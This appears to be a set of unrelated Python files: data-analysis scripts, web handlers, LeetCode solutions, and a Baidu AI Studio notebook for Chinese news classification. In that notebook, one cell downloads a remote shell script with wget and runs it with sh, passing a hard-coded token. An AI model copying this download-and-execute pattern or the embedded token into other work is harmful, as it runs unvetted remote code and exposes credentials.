df = pd.concat([df,x.dropna()],axis=1)
return df
z= cdf(pd.Series([y1,y]))
plt.plot(z)
#值机文件解析
"""
1.能成功解析文件
2.能发现有问题的文件
3.校验字段长度
"""
import pandas as pd
from pandas import Series,DataFrame
ls = Series(['rckCar','rckFln','rckFlx','rckFld','rckFlt','rckGsi','rckUpl','rckDis','rckPnr','rckMch','rckUci','rckDci','rckIvi','rckOcl','rckAdi',
'rckChi','rckPvi','rckJsi','rckEti','rckEtn','rckFsi','rckBd1','rckCan','rckCmr','rckCma','rckCpn','rckAin','rckEmd','rckIdi','rckCsi',
'rckFac','rckFpf','rckPjb','rckVip','rckGno','rckGnm','rckCpd','rckCwi','rckCno','rckCkn','rckIof','rckGds','rckDif','rckAfw',
'rckBfw','rckCkc','rckIak','rckIat','rckEc1','rckE1i','rckEc2','rckE2i','rckEc3','rckE3i','rckBwi'])
l = ['rckFln','rckFld','rckUpl','rckDis','rckDif','rckCwi','rckCma','rckCan']
idx = ls[ls.isin(l)].index
d = pd.read_csv(u'D:\桌面\行李\报告\国航201605数据\CA_CPDBAG_20160501.csv',usecols=idx,header=None,index_col=False,names=ls[idx])
#正则表达式
import re
text = "foo bar\t baz \tqux"
re.findall('\s+',text) |
# -*- coding: utf-8 -*-
'''
HTTP base handlers.
'''
# This file is part of citadel.
# Distributed under the terms of the last AGPL License.
# The full license is in the file LICENCE, distributed as part of this software.
__author__ = 'Team Machine'
from tornado import web
class BaseHandler(web.RequestHandler):
'''
gente d'armi e ganti
'''
@property
def kvalue(self):
'''
Key-value database
'''
return self.settings['kvalue']
def initialize(self, **kwargs):
'''
Initialize the Base Handler
'''
super(BaseHandler, self).initialize(**kwargs)
# System database
self.db = self.settings.get('db')
# System cache
self.cache = self.settings.get('cache')
# Page settings
self.page_size = self.settings.get('page_size')
# solr riak
self.solr = self.settings.get('solr')
def set_default_headers(self):
'''
default headers
'''
self.set_header("Access-Control-Allow-Origin", self.settings.get('domain', '*'))
|
from django.urls import path
from ebooks.api.views import (EbookDetailAPIView, EbookListCreateAPIView,
ReviewCreateAPIView, ReviewDetailAPIView)
urlpatterns = [
path("ebooks/",
EbookListCreateAPIView.as_view(),
name="ebook-list"),
path("ebooks/<int:pk>/",
EbookDetailAPIView.as_view(),
name="ebook-detail"),
path("ebooks/<int:ebook_pk>/review/",
ReviewCreateAPIView.as_view(),
name="ebook-review"),
path("reviews/<int:pk>/",
ReviewDetailAPIView.as_view(),
name="review-detail")
] |
from matplotlib.pyplot import *
from glob import glob
from datetime import datetime
import matplotlib.pyplot as plt
from numpy.random import randn
from os import path
import pandas as pd
import numpy as np
def file_search_glob(inpath, condition):
return glob(inpath + '\\'+condition)
def Get_rtrs(xlspath):
allplot = pd.read_excel(xlspath, sheet_name='All Data')
datatodo = allplot.iloc[:,12:20] #逗号之前表示取哪一行,之后表示取那一列 多维数组都是按照这种方式来取数据的,影像加上波段就是三维数组 矩阵切片 array slice
datatodo = np.array(datatodo) # 这个玩意是空的。
ABVs = datatodo[::6,:] #行方向上分隔成6个一组 列方向上都要
BLWs = datatodo.reshape([-1,6,8])[:,1:5,:] #reshape是改变矩阵的形状?后面那些代表什么意思
mean_per_seg = BLWs.mean(axis=1)
r_t_rs_per_seg = mean_per_seg/ABVs
r_t_rs_per_seg_mean = r_t_rs_per_seg.mean(axis=1) #axis=1代表什么
[r_point, t_point, rs_point] = r_t_rs_per_seg_mean.reshape([-1,3]).transpose(1,0)
[r_ESU, t_ESU, rs_ESU] = [i.reshape(-1,5).mean(axis=1) for i in [r_point, t_point, rs_point]]
doy = parse(xlspath)
FIPAR_ESU = 1-t_ESU
FAPAR_ESU = 1 - r_ESU - t_ESU * (1 - rs_ESU)
print(FIPAR_ESU.mean(), FAPAR_ESU.mean())
return doy, r_ESU.mean(), t_ESU.mean(), rs_ESU.mean(), FIPAR_ESU.mean(), FAPAR_ESU.mean()
def parse(filepath):
datestr = path.splitext(path.basename(filepath).split('_')[1])[0]
thisdate = datetime.strptime(datestr,'%Y%m%d')
doy = (thisdate - datetime(thisdate.year, 1, 1)).days + 1
return doy
# inpath = r"F:\Hailun_experiment_20160519\Data\AccuPAR\diffusion"
# files = file_search_glob(inpath,"*.xls")
# data = np.array([Get_rtrs(i) for i in files])
# doy = data[:,0].astype('int')
# r = data[:,1]
# t = data[:,2]
# rs = data[:,3]
#
#
# with open(r"F:\Hailun_experiment_20160519\Data\AccuPAR\AccuPAR_data.txt", "w") as f:
# f.write("%8s%8s%8s%8s\n" % ("doy", "ref", "trans", "ref_soil"))
# for aa, bb, cc, dd in zip(doy, r, t, rs):
# f.write("%s%8.2f%8.2f%8.2f\n" % (aa, bb, cc, dd))
# f.close()
inpath = r"F:\Hailun_experiment_20160519\Data\AccuPAR\diffusion"
files = file_search_glob(inpath,"*.xls")
data = np.array([Get_rtrs(i) for i in files])
doy = data[:,0].astype('int')
FIPAR_ESU = data[:,4]
FAPAR_ESU = data[:,5]
with open(r"F:\Hailun_experiment_20160519\Data\AccuPAR\AccuPAR_FPAR.txt", "w") as f:
f.write("%8s%8s%8s\n" % ("doy", "FIPAR_ESU", "FAPAR_ESU"))
for aa, bb, cc in zip(doy, FIPAR_ESU, FAPAR_ESU):
f.write("%s%8.2f%8.2f\n" % (aa, bb, cc))
f.close()
fig = plt.figure()
ax = fig.add_subplot(3,2,1)
filename = r"F:\Hailun_experiment_20160519\Data\AccuPAR\plotA_FPAR.txt"
a, b, c = [], [], []
with open(filename, 'r') as f:#1
lines = f.readlines()#2
for line in lines:#3
value = [float(s) for s in line.split()]#4
print(value)
a.append(value[0])#5
b.append(value[1])
c.append(value[2])
fig.set_size_inches([35 / 2.54, 30/ 2.54])
ax.plot(a, b, marker='o', color='b',linewidth=2)
ax.plot(a, c, marker='^', color='r',linewidth=2)
ax.tick_params(direction='in',which='both', top='on', right='on')
majorLocator = MultipleLocator(10)
majorFormatter = FormatStrFormatter('%d')
minorLocator = MultipleLocator(5)
ax.set_xlim(170, 270)
ax.set_xlabel('Day of year', fontsize='15')
ax.set_ylabel('FPAR', fontsize='15')
ax.text(172, 0.93, r'(a) Plot A (Maize)', ha='left', color='k', fontsize=13)
ax.legend(['FIPAR','FAPAR'],ncol=1,borderpad=0.2,handletextpad=0,columnspacing =1,handlelength =3,frameon =False,loc='lower right',fontsize=13) |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012, Clément MATHIEU
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import subprocess
import sys
import Image
import subprocess
import tempfile
if sys.hexversion >= 0x02070000:
check_output = subprocess.check_output
else:
def _check_output_backport(*popenargs, **kwargs):
r"""Run command with arguments and return its output as a byte string.
Backported from Python 2.7 as it's implemented as pure python on stdlib.
>>> check_output(['/usr/bin/python', '--version'])
Python 2.6.2
"""
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
error = subprocess.CalledProcessError(retcode, cmd)
error.output = output
raise error
return output
check_output = _check_output_backport
class SwfConverter(object):
"""Convert SWF slides into an images
Require swfrender (from swftools: http://www.swftools.org/)
"""
# Currently rely on swftools
#
# Would be great to have a native python dependency to convert swf into png or jpg.
# However it seems that pyswf isn't flawless. Some graphical elements (like the text!) are lost during
# the export.
def __init__(self, swfrender_path='swfrender'):
self.swfrender = swfrender_path
self._stdout = None
self._stderr = None
def to_png(self, swf_path, png_path=None):
""" Convert a slide into a PNG image.
OSError is raised if swfrender is not available.
An exception is raised if image cannot be created.
"""
if not png_path:
png_path = swf_path.replace(".swf", ".png")
try:
cmd = [self.swfrender, swf_path, '-o', png_path]
check_output(cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
raise Exception(u"Failed to convert SWF file %s.\n"
u"\tExit status: %s.\n\tOutput:\n%s" % (swf_path, e.returncode, e.output))
return png_path
def to_jpeg(self, swf_path, jpg_path=None):
""" Convert a slide into a PNG image.
OSError is raised if swfrender is not available.
An exception is raised if image cannot be created.
"""
if not jpg_path:
jpg_path = swf_path.replace(".swf", ".jpg")
png_path = tempfile.mktemp(suffix=".png")
self.to_png(swf_path, png_path)
Image.open(png_path).convert('RGB').save(jpg_path, 'jpeg')
os.remove(png_path)
return jpg_path
|
class Solution:
def findLongestWord(self, s: str, d: List[str]) -> str:
def is_subseq(main: str, sub: str) -> bool:
i, j, m, n = 0, 0, len(main), len(sub)
while i < m and j < n and n - j >= m - i:
if main[i] == sub[j]:
i += 1
j += 1
return i == m
res = ''
helper = sorted(d, key = lambda x: len(x), reverse = True)
for word in helper:
if len(word) < len(res): return res
if ( not res or word < res ) and is_subseq(word, s):
res = word
return res |
import pickle
path = "../models/%s/svhn/num_clusters_100/cluster_%u/record.pkl"
clusters = 100
names = ["einet_0_0", "einet_0_1"]
c_idx = [i for i in range(clusters)]
for name in names:
avg_best = 0.0
for c in c_idx:
try:
f = path % (name, c)
l = pickle.load(open(f, 'rb'))
best_idx = l['valid_ll'].index(max(l['valid_ll'])) # might throw value error. be careful since try will catch it so no error output
test_ll = l['test_ll'][best_idx]
print("%u %s %f %f" % (c, name, l['best_validation_ll'], test_ll))
avg_best += test_ll
except Exception as e:
print(e)
pass
avg_best /= clusters
print("%s %f" % (name, avg_best)) |
with open('input_xr.txt') as f:
data_list = f.read().splitlines()
data_list = [int(i) for i in data_list]
for i in range(len(data_list)):
for j in range(i, len(data_list)):
for k in range(j, len(data_list)):
if(data_list[i] + data_list[j] + data_list[k] == 2020):
result = data_list[i]*data_list[j]*data_list[k]
print(result) |
from os import environ
from os.path import join as path_join
if "ISISROOT" not in environ.keys():
environ["ISISROOT"] = environ["CONDA_PREFIX"]
if "ISISDATA" not in environ.keys():
environ["ISISDATA"] = path_join(environ["ISISROOT"], "data")
|
import re
email_address = 'Please contact us at: support@datacamp.com'
match = re.search(r'([\w\.-]+)@([\w\.-]+)', email_address)
if match:
print(match.group()) # The whole matched text
print(match.group(1)) # The username (group 1)
print(match.group(2)) # The host (group 2)
|
# Created by Luis A. Sanchez-Perez (alejand@umich.edu).
# Copyright © Do not distribute or use without authorization from author
import tensorflow as tf
class SpectrogamSequencer(tf.keras.layers.Layer):
"""
A non-trainable layer to generate a sequence of potentially overlapping window from an input spectrogram.
Inputs are expected to be (batch, freq, time, 1)
Outputs will be (batch, windows, freq, time, 1)
"""
def __init__(self, window_size: int, window_overlap=0.5, name='Sequencer', **kwargs):
super(SpectrogamSequencer, self).__init__(name=name, **kwargs)
# Config to determine sequences
self.window_size = window_size
self.window_overlap = window_overlap
# Items related to the input/output shape
self.indexes = None
self.channels = None
self.mfcc = None
self.length = None
# Not trainable layer
self.trainable = False
def build(self, input_shape):
# Determines indexes for slicing
samples = input_shape[2]
step = int(self.window_size * (1.0 - self.window_overlap))
start = tf.range(0, samples - self.window_size, step)
end = tf.range(self.window_size, samples, step)
self.indexes = tf.stack([start, end], axis=1)
self.length = start.shape[0]
self.channels = input_shape[-1]
self.mfcc = input_shape[0]
def call(self, inputs):
# Check slices indexes are generated already
if self.indexes is None:
raise Exception('You must build the layer before calling it.')
# Get slices from input
sequence = tf.map_fn(lambda index: inputs[:, :, index[0]:index[1], :],
self.indexes,
back_prop=False,
dtype=tf.float32)
# Set proper output shape
output = tf.transpose(sequence, perm=[1, 0, 2, 3, 4])
shape = tf.TensorShape(
[None, self.length, self.mfcc, self.window_size, self.channels]
)
output.set_shape(shape)
return output
|
from celery.decorators import periodic_task
from celery.schedules import crontab
from django.conf import settings
from django.template.loader import get_template
from django.template import Context
from django.core.mail import EmailMultiAlternatives
import redis
import json
@periodic_task(run_every=(crontab(minute='*/1')))
def send_super_statistic():
r = redis.StrictRedis(
host=settings.CELERY_REDIS_HOST,
port=settings.CELERY_REDIS_PORT,
db=settings.CELERY_REDIS_DB
)
redis_key = settings.REDIS_VAR
obj_len = r.llen(redis_key)
subject = 'Data reporting'
from_email = settings.EMAIL_HOST_USER
if obj_len:
object_list = []
row_object_list = r.lrange(redis_key, 0, obj_len-1)
for obj in row_object_list:
object_list.append(json.loads(obj))
htmly = get_template('addition_page/email_super_statistic.html')
text_content = htmly.render(Context({'object_list': object_list}))
msg = EmailMultiAlternatives(
subject,
text_content,
from_email,
settings.EMAIL_SUPERUSERS
)
msg.attach_alternative(text_content, 'text/html')
msg.send()
r.ltrim(redis_key, obj_len, -1)
else:
print 'null'
|
class Solution(object):
def letterCombinations(self, digits):
"""
:type digits: str
:rtype: List[str]
"""
# at the beginnning set it to empty list
combinations = []
self.helper(digits, combinations.append, 0, [])
return combinations
def helper(self, digits, combinations, index, prefix=None):
"""
Helper function to build the combination
"""
digit_map = {
'1': '', '2': 'abc', '3': 'def',
'4': 'ghi', '5': 'jkl', '6': 'mno',
'7': 'pqrs', '8': 'tuv', '9': 'wxyz'
}
if prefix is None:
prefix = []
if len(digits) == 1:
return digit_map[digits]
if index >= len(digits):
prefix.append(prefix)
return
pass
def iterative_combination(self, digits):
"""
Credit:
https://leetcode.com/problems/letter-combinations-of-a-phone-number/discuss/184395/Python-20ms-faster-than-100.00-of-other-python-submissions
"""
digit_map = {
'1': '', '2': 'abc', '3': 'def',
'4': 'ghi', '5': 'jkl', '6': 'mno',
'7': 'pqrs', '8': 'tuv', '9': 'wxyz'
}
all_combinations = [""]
for digit in digits:
print(f'digit: {digit}')
current_comb = []
print(f'curr comb {current_comb}')
for com in all_combinations:
for letter in digit_map[digit]:
print(f'com {com}, letter: {letter}')
current_comb.append(com + letter)
print(f'all: {all_combinations}')
all_combinations = current_comb
print(f'after all: {all_combinations}')
return all_combinations
digits = '29'
obj = Solution()
combinations = obj.iterative_combination(digits)
print(combinations)
|
import re
from emailReceive import EmailReceive
from emailSend import EmailSend
class EmailUtil(object):
@staticmethod
def getLink(address,password,title=('title',),regular=r'http',findAll=False,debug=0):
print('Getting into EmailReceive............')
allRes = EmailReceive(address, password).getEmail(keyword=title, onlyUnsee=False, findAll=findAll)
if allRes is None or allRes == []:
print('find email wrong:',title)
return 'Email Dead or nothing found'
print('find email ok:',title)
if debug == 1:
print(allRes)
pattern = re.compile(regular)
for head,body in allRes:
if body :
for item in body:
co = pattern.match(item.replace('\r\n','').replace('\n',''))
if co:
print('find email-web-link ok:',co.group(1))
return co.group(1)
print('find link wrong')
return 'Email Alive but noting found'
@staticmethod
def getEmail(address,password,title,onlyUnsee=False,findAll=True):
return EmailReceive(address,password).getEmail(keyword=title,onlyUnsee=onlyUnsee,findAll=findAll)
@staticmethod
def sendEmail(senderAddr,senderPassword,receiverList,title,body):
return EmailSend().sendEmail(senderAddr, senderPassword,receiverList,title, body)
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
# 查看当前挂载的数据集目录, 该目录下的变更重启环境后会自动还原
# View dataset directory. This directory will be recovered automatically after resetting environment.
get_ipython().system('ls /home/aistudio/data')
# In[ ]:
# 查看工作区文件, 该目录下的变更将会持久保存. 请及时清理不必要的文件, 避免加载过慢.
# View personal work directory. All changes under this directory will be kept even after reset. Please clean unnecessary files in time to speed up environment loading.
get_ipython().system('ls /home/aistudio/work')
# 请点击[此处](https://ai.baidu.com/docs#/AIStudio_Project_Notebook/a38e5576)查看本环境基本用法. <br>
# Please click [here ](https://ai.baidu.com/docs#/AIStudio_Project_Notebook/a38e5576) for more detailed instructions.
# In[1]:
get_ipython().system('unzip data/data25959/归档.zip')
# #建立字典 还原数据
# In[2]:
line= open ('dict.txt').read()
line=line[1:]
line=line[:-2]
dict1 = {}
ones= line.split(',')
for one in ones:
one=one.strip()
try:
dict1[one.split(':')[0].replace("'","")]=int(one.split(':')[1])
except IndexError as s:
pass
# In[3]:
dict1_rev = {v:k for k,v in dict1.items()}
dict1_rev[1466]=','
# In[36]:
import pandas as pd
data=[]
with open('shuffle_Train_IDs.txt', 'r', encoding='utf-8') as f:
lines = f.readlines()
for line in lines:
left,right=line.strip().split('\t')
tmp_sents = []
tmp=''
tmp_sents.append(right)
for word in left.strip().split(','):
tmp=tmp+dict1_rev[int(word)]
tmp_sents.append(tmp)
data.append(tmp_sents)
df=pd.DataFrame(data,columns=['label','text_a'])
df.to_csv('all_data.tsv',sep='\t',index=False)
# 数据增强:删除+替换
# In[49]:
df=pd.read_csv('pseudo_7.tsv',sep='\t')
print(len(df))
# In[8]:
m='0123456789'
new=[]
import random
for i in range(len(df)):
temp=[]
left=df['label'][i]
right=df['text_a'][i]
for j in right:
if j in m:
right=right.replace(j,'')
else:
continue
if len(right)>2:
u=random.randint(0,len(right)-2)
if len(right)>4:
v=random.randint(0,len(right)-4)
if len(right)>6:
w=random.randint(0,len(right)-6)
if len(right)>8:
x=random.randint(0,len(right)-8)
if len(right)<30:
right=right.replace(right[u:u+2],'')
elif len(right)<50 and len(right)>30:
right=right.replace(right[u:u+2],'')
right=right.replace(right[v:v+2],'')
elif len(right)<70 and len(right)>50:
right=right.replace(right[u:u+2],'')
right=right.replace(right[v:v+2],'')
right=right.replace(right[w:w+2],'')
else:
right=right.replace(right[u:u+2],'')
right=right.replace(right[v:v+2],'')
right=right.replace(right[w:w+2],'')
right=right.replace(right[x:x+2],'')
temp.append(left)
temp.append(right)
new.append(temp)
df1=pd.DataFrame(new,columns=['label','text_a'])
print(df1[:5])
print(len(df1))
# In[50]:
m='0123456789'
new1=[]
import random
for i in range(len(df)):
temp=[]
left=df['label'][i]
right=df['text_a'][i]
for j in right:
if j in m:
right=right.replace(j,'')
else:
continue
if len(right)>2:
u=random.randint(0,len(right)-2)
if len(right)>4:
v=random.randint(0,len(right)-4)
if len(right)>6:
w=random.randint(0,len(right)-6)
if len(right)>8:
x=random.randint(0,len(right)-8)
if len(right)<30:
right=right.replace(right[u:u+2],'')
elif len(right)<50 and len(right)>30:
right=right.replace(right[u:u+2],'')
right=right.replace(right[v:v+2],'')
elif len(right)<70 and len(right)>50:
right=right.replace(right[u:u+2],'')
right=right.replace(right[v:v+2],'')
right=right.replace(right[w:w+2],'')
else:
right=right.replace(right[u:u+2],'')
right=right.replace(right[v:v+2],'')
right=right.replace(right[w:w+2],'')
right=right.replace(right[x:x+2],'')
temp.append(left)
temp.append(right)
new1.append(temp)
df2=pd.DataFrame(new1,columns=['label','text_a'])
print(df2[:5])
print(len(df2))
# In[9]:
m='0123456789'
new2=[]
import random
for i in range(len(df)):
temp=[]
left=df['label'][i]
right=df['text_a'][i]
for j in right:
if j in m:
right=right.replace(j,'')
else:
continue
u=random.randint(0,len(right)-1)
v=random.randint(0,len(right)-1)
w=random.randint(0,len(right)-1)
x=random.randint(0,len(right)-1)
y=random.randint(0,len(right)-1)
if len(right)<30:
right=right.replace(right[u:u+2],right[v:v+2])
elif len(right)<50 and len(right)>30:
right=right.replace(right[u:u+2],right[v:v+2])
right=right.replace(right[v:v+2],right[w:w+2])
elif len(right)<70 and len(right)>50:
right=right.replace(right[u:u+2],right[w:w+2])
right=right.replace(right[w:w+2],right[v:v+2])
right=right.replace(right[v:v+2],right[x:x+2])
else:
right=right.replace(right[u:u+2],right[x:x+2])
right=right.replace(right[x:x+2],right[y:y+2])
right=right.replace(right[y:y+2],right[v:v+2])
right=right.replace(right[v:v+2],right[w:w+2])
temp.append(left)
temp.append(right)
new2.append(temp)
df3=pd.DataFrame(new2,columns=['label','text_a'])
print(df3[:5])
print(len(df3))
# In[51]:
m='0123456789'
new3=[]
import random
for i in range(len(df)):
temp=[]
left=df['label'][i]
right=df['text_a'][i]
for j in right:
if j in m:
right=right.replace(j,'')
else:
continue
u=random.randint(0,len(right)-1)
v=random.randint(0,len(right)-1)
w=random.randint(0,len(right)-1)
x=random.randint(0,len(right)-1)
y=random.randint(0,len(right)-1)
if len(right)<30:
right=right.replace(right[u:u+2],right[v:v+2])
elif len(right)<50 and len(right)>30:
right=right.replace(right[u:u+2],right[v:v+2])
right=right.replace(right[v:v+2],right[w:w+2])
elif len(right)<70 and len(right)>50:
right=right.replace(right[u:u+2],right[w:w+2])
right=right.replace(right[w:w+2],right[v:v+2])
right=right.replace(right[v:v+2],right[x:x+2])
else:
right=right.replace(right[u:u+2],right[x:x+2])
right=right.replace(right[x:x+2],right[y:y+2])
right=right.replace(right[y:y+2],right[v:v+2])
right=right.replace(right[v:v+2],right[w:w+2])
temp.append(left)
temp.append(right)
new3.append(temp)
df4=pd.DataFrame(new3,columns=['label','text_a'])
print(df4[:5])
print(len(df4))
# In[52]:
# df=df.append(df1)
df=df.append(df2)
# df=df.append(df3)
df=df.append(df4)
print(len(df))
# In[48]:
print(len(df1))
# In[53]:
df.to_csv('eda_p.tsv',sep='\t',header=True,index=False)
# 下载模型
# In[33]:
get_ipython().system('git clone https://github.com/PaddlePaddle/PALM.git')
# In[35]:
get_ipython().system('cp -r PALM/paddlepalm PALM/examples/classification')
# In[1]:
get_ipython().system('cp PALM/examples/classification/run.py PALM/examples/classification/run1.py')
# In[11]:
get_ipython().system("wget 'https://bert-models.bj.bcebos.com/chinese_roberta_wwm_ext_L-12_H-768_A-12.tar.gz'")
# In[2]:
get_ipython().system("wget 'https://baidu-nlp.bj.bcebos.com/ERNIE_stable-1.0.1.tar.gz'")
# In[86]:
get_ipython().system("wget 'https://bert-models.bj.bcebos.com/chinese_L-12_H-768_A-12.tar.gz'")
# In[1]:
get_ipython().system("wget 'https://ernie.bj.bcebos.com/ERNIE_1.0_max-len-512.tar.gz'")
# In[20]:
get_ipython().system("wget 'https://bert-models.bj.bcebos.com/chinese_roberta_wwm_large_ext_L-24_H-1024_A-16.tar.gz'")
# In[6]:
get_ipython().system('tar zxvf ERNIE_stable-1.0.1.tar.gz -C p/')
# In[21]:
get_ipython().system('tar zxvf chinese_roberta_wwm_large_ext_L-24_H-1024_A-16.tar.gz -C Roberta_large/')
# In[12]:
get_ipython().system('tar zxvf chinese_roberta_wwm_ext_L-12_H-768_A-12.tar.gz -C Roberta_base/')
# In[2]:
get_ipython().system('tar zxvf ERNIE_1.0_max-len-512.tar.gz -C ernie_large/')
# In[87]:
get_ipython().system('tar zxvf chinese_L-12_H-768_A-12.tar.gz -C b/')
# In[8]:
import pandas as pd
data=[]
with open('Test.txt', 'r', encoding='utf-8') as f:
lines = f.readlines()
for line in lines:
line=line.strip()
tmp_sents = []
tmp_sents.append(0)
tmp_sents.append(line)
data.append(tmp_sents)
df=pd.DataFrame(data,columns=['label','text_a'])
df.to_csv('pre.tsv',sep='\t',index=False,header=True)
# In[ ]:
get_ipython().system('python PALM/examples/classification/run1.py')
get_ipython().system('python PALM/examples/classification/run2.py')
# In[9]:
get_ipython().system('cp PALM/examples/classification/run1.py PALM/examples/classification/run2.py')
# 指定预测
# In[55]:
import pandas as pd
import json
import numpy as np
def res_evaluate(res_dir="./outputs7/predict/predictions.json", eval_phase='test'):
if eval_phase == 'test':
data_dir="pre.tsv"
elif eval_phase == 'dev':
data_dir="pre.tsv"
else:
assert eval_phase in ['dev', 'test'], 'eval_phase should be dev or test'
preds = []
with open(res_dir, "r") as file:
for line in file.readlines():
line = json.loads(line)
pred = line['label']
preds.append(str(pred))
df=pd.DataFrame()
df['label']=preds
df.to_csv('fin3.csv',index=False)
res_evaluate()
# In[56]:
import pandas as pd
df=pd.read_csv('fin3.csv')
print(len(df))
print(df[:5])
# In[71]:
df['label1'] = df['label'].map({0:'财经',1:'彩票',2:'房产',3:'股票',4:'家居',5:'教育',6:'科技',7:'社会',8:'时尚',9:'时政',10:'体育',11:'星座',12:'游戏',13:'娱乐'})
# In[72]:
print(len(df))
# In[73]:
print(df['label1'] [:5])
# In[74]:
df['label1'].to_csv('submission1.txt',index=False)
# In[ ]:
df['label1'].to_csv('my.csv',index=False)
# In[75]:
get_ipython().system('rm -rf submit.sh')
get_ipython().system('wget -O submit.sh http://ai-studio-static.bj.bcebos.com/script/submit.sh')
get_ipython().system('sh submit.sh submission1.txt 7abbc535bcc541c7afe59a0cee03fe7c')
# In[36]:
pre=pd.read_csv('pre.tsv',sep='\t')
print(pre[:30])
# In[39]:
s=pd.concat([pre['text_a'],df['label1']],axis=1) #在横向合并
# In[40]:
s.to_csv('fin4.csv',index=False)
# In[74]:
w=pd.read_csv('all_data.tsv',sep='\t')
print(len(w))
print(len(w[w['label']==0]))
print(len(w[w['label']==13])/len(w))
# merge结果
# In[77]:
# df=pd.DataFrame(columns=['a','b','c','d','e','f','g','h','i','j','k','l','m','n'])
import json
import numpy as np
import pandas as pd
preds1=[]
with open('outputs1-8/outputs1/predict/predictions.json', "r") as file:
for line in file.readlines():
line = json.loads(line)
probes = line['probs']
preds1.append(probes)
preds1=np.array(preds1)
preds2=[]
with open('outputs1-8/outputs2/predictions.json', "r") as file:
for line in file.readlines():
line = json.loads(line)
probes = line['probs']
preds2.append(probes)
preds2=np.array(preds2)
preds3=[]
with open('outputs1-8/outputs3/predictions.json', "r") as file:
for line in file.readlines():
line = json.loads(line)
probes = line['probs']
preds3.append(probes)
preds3=np.array(preds3)
preds4=[]
with open('outputs1-8/outputs4/predictions.json', "r") as file:
for line in file.readlines():
line = json.loads(line)
probes = line['probs']
preds4.append(probes)
preds4=np.array(preds4)
preds5=[]
with open('outputs1-8/outputs5/predictions.json', "r") as file:
for line in file.readlines():
line = json.loads(line)
probes = line['probs']
preds5.append(probes)
preds5=np.array(preds5)
preds6=[]
with open('outputs1-8/outputs6/predict/predictions.json', "r") as file:
for line in file.readlines():
line = json.loads(line)
probes = line['probs']
preds6.append(probes)
preds6=np.array(preds6)
preds7=[]
with open('outputs1-8/outputs7/predict/predictions.json', "r") as file:
for line in file.readlines():
line = json.loads(line)
probes = line['probs']
preds7.append(probes)
preds7=np.array(preds7)
preds8=[]
with open('outputs1-8/outputs8/predict/predictions.json', "r") as file:
for line in file.readlines():
line = json.loads(line)
probes = line['probs']
preds8.append(probes)
preds8=np.array(preds8)
preds9=[]
with open('outputs9/predict/predictions.json', "r") as file:
for line in file.readlines():
line = json.loads(line)
probes = line['probs']
preds9.append(probes)
preds9=np.array(preds9)
preds10=[]
with open('outputs10/predictions.json', "r") as file:
for line in file.readlines():
line = json.loads(line)
probes = line['probs']
preds10.append(probes)
preds10=np.array(preds10)
preds11=[]
with open('outputs11/predict/predictions.json', "r") as file:
for line in file.readlines():
line = json.loads(line)
probes = line['probs']
preds11.append(probes)
preds11=np.array(preds11)
preds12=[]
with open('outputs12/predict/predictions.json', "r") as file:
for line in file.readlines():
line = json.loads(line)
probes = line['probs']
preds12.append(probes)
preds12=np.array(preds12)
preds13=[]
with open('outputs13/predict/predictions.json', "r") as file:
for line in file.readlines():
line = json.loads(line)
probes = line['probs']
preds13.append(probes)
preds13=np.array(preds13)
new=1/13*preds1+1/13*preds2+1/13*preds3+1/13*preds4+1/13*preds5+1/13*preds6+1/13*preds7+1/13*preds8+1/13*preds9+1/13*preds10+1/13*preds11+1/13*preds12+1/13*preds13
# new=1/3*preds11+1/3*preds12+1/3*preds13
print(new[:5])
df=pd.DataFrame()
# df.columns=['a','b','c','d','e','f','g','h','i','j','k','l','m','n']
df['label']=np.argmax(new,axis=1)
df['m']=np.max(new,axis=1)
# df['all']=0.3*df['pro1']+0.4*df['pro2']+0.3*df['pro3']
# df['pred']=0
# df.loc[df['all']>=0.5,'pred']=1
# df.loc[df['all']<0.5,'pred']=0
df['result']=df['label'].astype(str)
# df.to_csv('fin5.csv',index=False)
# In[78]:
pre=pd.read_csv('pre.tsv',sep='\t')
pre['prob']=df['m']
pre['label']=df['label']
print(pre[:5])
# 建立伪标签 重复
# In[79]:
useful=pre[pre['prob']>0.9][['label','text_a']]
print(len(useful))
print(len(pre))
print(useful)
# In[80]:
train=pd.read_csv('7.tsv',sep='\t')
print(len(train))
new_train = pd.concat([train, useful]).reset_index(drop=True)
print(len(new_train))
print(new_train[:5])
# In[81]:
new_train.to_csv('pseudo_7.tsv',sep='\t',index=False,header=True)
# In[54]:
a=pd.read_csv('pseudo.tsv',sep='\t')
print(len(a))
print(a[:5])
# In[29]:
get_ipython().system('cp outputs/predict10/predictions.json outputs10/')
# In[ ]:
# In[76]:
data=pd.read_csv('all_data.tsv',sep='\t')
print(len(data))
df=data[:int(len(data)*0.7)]
print(len(df))
print(df[:5])
df.to_csv('7.tsv',sep='\t',header=True,index=False)
# In[ ]:
|
from sklearn.linear_model import LinearRegression
import statsmodels.api as sm
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#분석할 데이터 불러오기
